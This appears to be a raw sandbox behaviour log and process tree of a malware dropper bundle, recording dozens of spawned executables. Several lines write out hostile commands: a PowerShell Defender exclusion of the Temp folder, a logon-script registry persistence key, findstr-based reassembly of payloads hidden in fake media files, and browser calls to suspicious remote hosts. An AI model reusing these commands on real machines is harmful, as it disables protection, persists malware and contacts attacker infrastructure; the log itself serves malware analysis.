cmd.exe Fri195cd4dbfdf37897.exe PID 5024 wrote to memory of 4852 5024 cmd.exe Fri195cd4dbfdf37897.exe PID 5024 wrote to memory of 4852 5024 cmd.exe Fri195cd4dbfdf37897.exe PID 2400 wrote to memory of 3924 2400 cmd.exe Fri19d30056588.exe PID 2400 wrote to memory of 3924 2400 cmd.exe Fri19d30056588.exe PID 2400 wrote to memory of 3924 2400 cmd.exe Fri19d30056588.exe PID 3896 wrote to memory of 4868 3896 cmd.exe Fri191454c4b4.exe PID 3896 wrote to memory of 4868 3896 cmd.exe Fri191454c4b4.exe PID 4124 wrote to memory of 4764 4124 setup_install.exe cmd.exe PID 4124 wrote to memory of 4764 4124 setup_install.exe cmd.exe PID 4124 wrote to memory of 4764 4124 setup_install.exe cmd.exe PID 5040 wrote to memory of 1020 5040 cmd.exe Fri192c305b4a.exe PID 5040 wrote to memory of 1020 5040 cmd.exe Fri192c305b4a.exe PID 980 wrote to memory of 4792 980 cmd.exe Fri192902b3c24.exe PID 980 wrote to memory of 4792 980 cmd.exe Fri192902b3c24.exe PID 980 wrote to memory of 4792 980 cmd.exe Fri192902b3c24.exe PID 4832 wrote to memory of 3728 4832 cmd.exe powershell.exe PID 4832 wrote to memory of 3728 4832 cmd.exe powershell.exe PID 4832 wrote to memory of 3728 4832 cmd.exe powershell.exe PID 4124 wrote to memory of 4596 4124 setup_install.exe cmd.exe PID 4124 wrote to memory of 4596 4124 setup_install.exe cmd.exe PID 4124 wrote to memory of 4596 4124 setup_install.exe cmd.exe PID 4476 wrote to memory of 4840 4476 cmd.exe Fri19870e2febf5544.exe PID 4476 wrote to memory of 4840 4476 cmd.exe Fri19870e2febf5544.exe PID 4476 wrote to memory of 4840 4476 cmd.exe Fri19870e2febf5544.exe
Processes
-
C:\Users\Admin\AppData\Local\Temp\setup_x86_x64_install.exe"C:\Users\Admin\AppData\Local\Temp\setup_x86_x64_install.exe"1⤵
- Suspicious use of WriteProcessMemory
-
C:\Users\Admin\AppData\Local\Temp\setup_installer.exe"C:\Users\Admin\AppData\Local\Temp\setup_installer.exe"2⤵
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
-
C:\Users\Admin\AppData\Local\Temp\7zSCC2325E3\setup_install.exe"C:\Users\Admin\AppData\Local\Temp\7zSCC2325E3\setup_install.exe"3⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c powershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Local\Temp"4⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Local\Temp"5⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c Fri192c305b4a.exe4⤵
- Suspicious use of WriteProcessMemory
-
C:\Users\Admin\AppData\Local\Temp\7zSCC2325E3\Fri192c305b4a.exeFri192c305b4a.exe5⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
-
C:\Users\Admin\AppData\Local\Temp\tmpD5D9_tmp.exe"C:\Users\Admin\AppData\Local\Temp\tmpD5D9_tmp.exe"6⤵
- Executes dropped EXE
- Adds Run key to start application
-
C:\Windows\SysWOW64\dllhost.exedllhost.exe7⤵
-
C:\Windows\SysWOW64\cmd.execmd /c cmd < Attesa.wmv7⤵
-
C:\Windows\SysWOW64\cmd.execmd8⤵
-
C:\Windows\SysWOW64\findstr.exefindstr /V /R "^VksJcWfNcDMqfgfCCoOQaENLrlkioAEZRevWUFgpnuTZyylQxdxsqDodbFGlKiEVZMohRaHWUFajKOGYZxNRyhZgTymgZtndBYqaWXYwInbclWFIZIldx$" Braccio.wmv9⤵
-
C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\Adorarti.exe.comAdorarti.exe.com u9⤵
- Executes dropped EXE
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
-
C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\Adorarti.exe.comC:\Users\Admin\AppData\Local\Temp\IXP000.TMP\Adorarti.exe.com u10⤵
- Executes dropped EXE
-
C:\Windows\SysWOW64\PING.EXEping localhost9⤵
- Runs ping.exe
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c Fri192b9eeaa03b.exe4⤵
-
C:\Users\Admin\AppData\Local\Temp\7zSCC2325E3\Fri192b9eeaa03b.exeFri192b9eeaa03b.exe5⤵
- Executes dropped EXE
-
C:\Users\Admin\AppData\Local\Temp\is-4PHU1.tmp\Fri192b9eeaa03b.tmp"C:\Users\Admin\AppData\Local\Temp\is-4PHU1.tmp\Fri192b9eeaa03b.tmp" /SL5="$301FE,506086,422400,C:\Users\Admin\AppData\Local\Temp\7zSCC2325E3\Fri192b9eeaa03b.exe"6⤵
- Executes dropped EXE
- Loads dropped DLL
-
C:\Users\Admin\AppData\Local\Temp\is-BO389.tmp\46807GHF____.exe"C:\Users\Admin\AppData\Local\Temp\is-BO389.tmp\46807GHF____.exe" /S /UID=burnerch27⤵
- Drops file in Drivers directory
- Executes dropped EXE
- Adds Run key to start application
- Drops file in Program Files directory
- Suspicious use of AdjustPrivilegeToken
-
C:\Program Files\Windows Defender\MONPZZPOWK\ultramediaburner.exe"C:\Program Files\Windows Defender\MONPZZPOWK\ultramediaburner.exe" /VERYSILENT8⤵
- Executes dropped EXE
-
C:\Users\Admin\AppData\Local\Temp\is-279FQ.tmp\ultramediaburner.tmp"C:\Users\Admin\AppData\Local\Temp\is-279FQ.tmp\ultramediaburner.tmp" /SL5="$302EC,281924,62464,C:\Program Files\Windows Defender\MONPZZPOWK\ultramediaburner.exe" /VERYSILENT9⤵
- Executes dropped EXE
- Drops file in Program Files directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of FindShellTrayWindow
-
C:\Program Files (x86)\UltraMediaBurner\UltraMediaBurner.exe"C:\Program Files (x86)\UltraMediaBurner\UltraMediaBurner.exe" -silent -desktopShortcut -programMenu10⤵
- Executes dropped EXE
-
C:\Users\Admin\AppData\Local\Temp\7e-f5799-f10-2a6b4-2ccce90ae9ef7\Syzhaloluxy.exe"C:\Users\Admin\AppData\Local\Temp\7e-f5799-f10-2a6b4-2ccce90ae9ef7\Syzhaloluxy.exe"8⤵
- Executes dropped EXE
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://www.profitabletrustednetwork.com/e2q8zu9hu?key=a971bbe4a40a7216a1a87d8f455f71e69⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.107 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.62 --initial-client-data=0x104,0x108,0x10c,0xe0,0x110,0x7fffd15546f8,0x7fffd1554708,0x7fffd155471810⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://www.profitabletrustednetwork.com/b1fsmdd9m?key=7e872dab99d78bffc4aa0c1e6b062dad9⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.107 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.62 --initial-client-data=0x100,0x104,0x108,0xdc,0x10c,0x7fffd15546f8,0x7fffd1554708,0x7fffd155471810⤵
-
C:\Users\Admin\AppData\Local\Temp\02-5225f-632-e4392-7b8384af4cdf0\Bexaepunuly.exe"C:\Users\Admin\AppData\Local\Temp\02-5225f-632-e4392-7b8384af4cdf0\Bexaepunuly.exe"8⤵
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\rnnotwb2.2a4\GcleanerEU.exe /eufive & exit9⤵
-
C:\Users\Admin\AppData\Local\Temp\rnnotwb2.2a4\GcleanerEU.exeC:\Users\Admin\AppData\Local\Temp\rnnotwb2.2a4\GcleanerEU.exe /eufive10⤵
- Executes dropped EXE
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 7800 -s 28011⤵
- Program crash
- Checks processor information in registry
- Enumerates system info in registry
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\pbei2apw.kcp\installer.exe /qn CAMPAIGN="654" & exit9⤵
-
C:\Users\Admin\AppData\Local\Temp\pbei2apw.kcp\installer.exeC:\Users\Admin\AppData\Local\Temp\pbei2apw.kcp\installer.exe /qn CAMPAIGN="654"10⤵
- Executes dropped EXE
- Loads dropped DLL
- Enumerates connected drives
- Modifies system certificate store
- Suspicious use of FindShellTrayWindow
-
C:\Windows\SysWOW64\msiexec.exe"C:\Windows\system32\msiexec.exe" /i "C:\Users\Admin\AppData\Roaming\AW Manager\Windows Manager 1.0.0\install\97FDF62\Windows Manager - Postback Y.msi" /qn CAMPAIGN=654 AI_SETUPEXEPATH=C:\Users\Admin\AppData\Local\Temp\pbei2apw.kcp\installer.exe SETUPEXEDIR=C:\Users\Admin\AppData\Local\Temp\pbei2apw.kcp\ EXE_CMD_LINE="/exenoupdates /forcecleanup /wintime 1631048152 /qn CAMPAIGN=""654"" " CAMPAIGN="654"11⤵
- Enumerates connected drives
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\3b1k1ccd.mta\anyname.exe & exit9⤵
-
C:\Users\Admin\AppData\Local\Temp\3b1k1ccd.mta\anyname.exeC:\Users\Admin\AppData\Local\Temp\3b1k1ccd.mta\anyname.exe10⤵
- Executes dropped EXE
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\1fmhbltr.0jy\gcleaner.exe /mixfive & exit9⤵
-
C:\Users\Admin\AppData\Local\Temp\1fmhbltr.0jy\gcleaner.exeC:\Users\Admin\AppData\Local\Temp\1fmhbltr.0jy\gcleaner.exe /mixfive10⤵
- Executes dropped EXE
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 4864 -s 28411⤵
- Program crash
- Checks processor information in registry
- Enumerates system info in registry
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\qnvqiuhq.4z2\autosubplayer.exe /S & exit9⤵
- Suspicious use of SetWindowsHookEx
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c Fri191454c4b4.exe4⤵
- Suspicious use of WriteProcessMemory
-
C:\Users\Admin\AppData\Local\Temp\7zSCC2325E3\Fri191454c4b4.exeFri191454c4b4.exe5⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
-
C:\ProgramData\5390489.exe"C:\ProgramData\5390489.exe"6⤵
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\system32\WerFault.exeC:\Windows\system32\WerFault.exe -u -p 1684 -s 22767⤵
- Program crash
- Checks processor information in registry
- Enumerates system info in registry
- Suspicious behavior: EnumeratesProcesses
-
C:\ProgramData\2042317.exe"C:\ProgramData\2042317.exe"6⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
- Executes dropped EXE
- Adds Run key to start application
-
C:\Users\Admin\AppData\Roaming\WinHost\WinHoster.exe"C:\Users\Admin\AppData\Roaming\WinHost\WinHoster.exe"7⤵
- Executes dropped EXE
-
C:\ProgramData\5643419.exe"C:\ProgramData\5643419.exe"6⤵
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 5804 -s 24007⤵
- Program crash
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c Fri195cd4dbfdf37897.exe4⤵
- Suspicious use of WriteProcessMemory
-
C:\Users\Admin\AppData\Local\Temp\7zSCC2325E3\Fri195cd4dbfdf37897.exeFri195cd4dbfdf37897.exe5⤵
- Executes dropped EXE
-
C:\Users\Admin\AppData\Local\Temp\is-S5H3Q.tmp\Fri195cd4dbfdf37897.tmp"C:\Users\Admin\AppData\Local\Temp\is-S5H3Q.tmp\Fri195cd4dbfdf37897.tmp" /SL5="$6014A,138429,56832,C:\Users\Admin\AppData\Local\Temp\7zSCC2325E3\Fri195cd4dbfdf37897.exe"6⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious use of FindShellTrayWindow
-
C:\Users\Admin\AppData\Local\Temp\is-TR9CL.tmp\Setup.exe"C:\Users\Admin\AppData\Local\Temp\is-TR9CL.tmp\Setup.exe" /Verysilent7⤵
- Executes dropped EXE
- Drops file in Program Files directory
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://iplis.ru/1S2Qs78⤵
- Adds Run key to start application
- Enumerates system info in registry
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of FindShellTrayWindow
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.107 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.62 --initial-client-data=0x10c,0x110,0x114,0xe8,0x118,0x7fffd15546f8,0x7fffd1554708,0x7fffd15547189⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2124,15415701167671449694,6207039132450003548,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2132 /prefetch:29⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=2124,15415701167671449694,6207039132450003548,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2224 /prefetch:39⤵
- Suspicious behavior: EnumeratesProcesses
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=2124,15415701167671449694,6207039132450003548,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2824 /prefetch:89⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2124,15415701167671449694,6207039132450003548,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3320 /prefetch:19⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2124,15415701167671449694,6207039132450003548,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3340 /prefetch:19⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2124,15415701167671449694,6207039132450003548,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=7 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4976 /prefetch:19⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2124,15415701167671449694,6207039132450003548,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=8 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3848 /prefetch:19⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.62\identity_helper.exe"C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.62\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2124,15415701167671449694,6207039132450003548,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5636 /prefetch:89⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.62\identity_helper.exe"C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.62\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2124,15415701167671449694,6207039132450003548,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5636 /prefetch:89⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2124,15415701167671449694,6207039132450003548,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=10 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3512 /prefetch:19⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2124,15415701167671449694,6207039132450003548,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=11 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5952 /prefetch:19⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2124,15415701167671449694,6207039132450003548,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=12 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5108 /prefetch:19⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2124,15415701167671449694,6207039132450003548,131072 --disable-gpu-sandbox --use-gl=disabled --gpu-vendor-id=5140 --gpu-device-id=140 --gpu-sub-system-id=0 --gpu-revision=0 --gpu-driver-version=10.0.22000.1 --gpu-preferences=UAAAAAAAAADoAAAQAAAAAAAAAAAAAAAAAABgAAAEAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=3988 /prefetch:29⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2124,15415701167671449694,6207039132450003548,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=14 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=1256 /prefetch:19⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=2124,15415701167671449694,6207039132450003548,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=5516 /prefetch:89⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=audio.mojom.AudioService --field-trial-handle=2124,15415701167671449694,6207039132450003548,131072 --lang=en-US --service-sandbox-type=audio --mojo-platform-channel-handle=6112 /prefetch:89⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2124,15415701167671449694,6207039132450003548,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=17 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=1756 /prefetch:19⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2124,15415701167671449694,6207039132450003548,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=18 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6096 /prefetch:19⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2124,15415701167671449694,6207039132450003548,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=19 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3500 /prefetch:19⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2124,15415701167671449694,6207039132450003548,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=20 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6276 /prefetch:19⤵
-
C:\Program Files (x86)\SmartPDF\SmartPDF\Setup.exe"C:\Program Files (x86)\SmartPDF\SmartPDF\Setup.exe"8⤵
- Executes dropped EXE
- Modifies registry class
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\Users\Admin\AppData\Local\Temp\Mortician.exe"C:\Users\Admin\AppData\Local\Temp\Mortician.exe"9⤵
-
C:\Windows\SysWOW64\cmd.exe"cmd" /c cmd < Cerchia.vsdx10⤵
-
C:\Windows\SysWOW64\cmd.execmd11⤵
-
C:\Windows\SysWOW64\findstr.exefindstr /V /R "^JdxmflaMoKJKGKEonRKIDlCuNBztuuxobvTVXbusdtKZTUcnQFZrvdHmOhLNQgGwfAjlQJkqLaammCjTuVhBisMuOxuJLaA$" Attesa.vsdx12⤵
-
C:\Users\Admin\AppData\Roaming\Impedire.exe.comImpedire.exe.com I12⤵
- Executes dropped EXE
-
C:\Users\Admin\AppData\Roaming\Impedire.exe.comC:\Users\Admin\AppData\Roaming\Impedire.exe.com I13⤵
- Executes dropped EXE
-
C:\Windows\SysWOW64\PING.EXEping localhost12⤵
- Runs ping.exe
-
C:\Users\Admin\AppData\Local\Temp\foradvertising.exe"C:\Users\Admin\AppData\Local\Temp\foradvertising.exe" /wws19⤵
- Executes dropped EXE
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 5796 -s 29610⤵
- Program crash
- Checks processor information in registry
- Enumerates system info in registry
-
C:\Users\Admin\AppData\Local\Temp\wrap 1.exe"C:\Users\Admin\AppData\Local\Temp\wrap 1.exe"9⤵
- Executes dropped EXE
-
C:\Users\Admin\AppData\Local\Temp\gdgame.exe"C:\Users\Admin\AppData\Local\Temp\gdgame.exe"9⤵
- Executes dropped EXE
- Modifies registry class
-
C:\Users\Admin\AppData\Local\Temp\gdgame.exe"C:\Users\Admin\AppData\Local\Temp\gdgame.exe" -a10⤵
- Executes dropped EXE
-
C:\Users\Admin\AppData\Local\Temp\installer.exe"C:\Users\Admin\AppData\Local\Temp\installer.exe" /qn CAMPAIGN="710"9⤵
- Executes dropped EXE
-
C:\Users\Admin\AppData\Local\Temp\jg6_6asg.exe"C:\Users\Admin\AppData\Local\Temp\jg6_6asg.exe"9⤵
- Checks whether UAC is enabled
- Drops file in Program Files directory
-
C:\Users\Admin\AppData\Local\Temp\IBInstaller_74449.exe"C:\Users\Admin\AppData\Local\Temp\IBInstaller_74449.exe" /VERYSILENT /PASSWORD=kSWIzY9AFOirvP3TueIs74449 -token mtn1co3fo4gs5vwq -subid 7219⤵
-
C:\Users\Admin\AppData\Local\Temp\is-J1RG5.tmp\IBInstaller_74449.tmp"C:\Users\Admin\AppData\Local\Temp\is-J1RG5.tmp\IBInstaller_74449.tmp" /SL5="$50382,14736060,721408,C:\Users\Admin\AppData\Local\Temp\IBInstaller_74449.exe" /VERYSILENT /PASSWORD=kSWIzY9AFOirvP3TueIs74449 -token mtn1co3fo4gs5vwq -subid 72110⤵
-
C:\Windows\SysWOW64\cmd.exe"cmd.exe" /c expand C:\Users\Admin\AppData\Local\Temp\is-H5OCM.tmp\{app}\microsoft.cab -F:* %ProgramData%11⤵
-
C:\Windows\SysWOW64\expand.exeexpand C:\Users\Admin\AppData\Local\Temp\is-H5OCM.tmp\{app}\microsoft.cab -F:* C:\ProgramData12⤵
-
C:\Windows\SysWOW64\cmd.exe"cmd.exe" /c reg add "HKEY_CURRENT_USER\Environment" /v UserInitMprLogonScript /t REG_EXPAND_SZ /d "%ProgramData%\regid.1993-06.com.microsoft\svrwebui.exe" /f11⤵
-
C:\Windows\SysWOW64\reg.exereg add "HKEY_CURRENT_USER\Environment" /v UserInitMprLogonScript /t REG_EXPAND_SZ /d "C:\ProgramData\regid.1993-06.com.microsoft\svrwebui.exe" /f12⤵
-
C:\ProgramData\regid.1993-06.com.microsoft\svrwebui.exe"C:\ProgramData\regid.1993-06.com.microsoft\svrwebui.exe"11⤵
-
C:\Windows\SysWOW64\cmd.exe"cmd.exe" /c start http://closerejfurk32.top/pgudonqntu/zmsaksepfx.php?xdl=mtn1co3fo4gs5vwq^&cid=74449^¶m=72111⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument http://closerejfurk32.top/pgudonqntu/zmsaksepfx.php?xdl=mtn1co3fo4gs5vwq&cid=74449¶m=72112⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.107 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.62 --initial-client-data=0x100,0x104,0x108,0xdc,0x10c,0x7fffd15546f8,0x7fffd1554708,0x7fffd155471813⤵
-
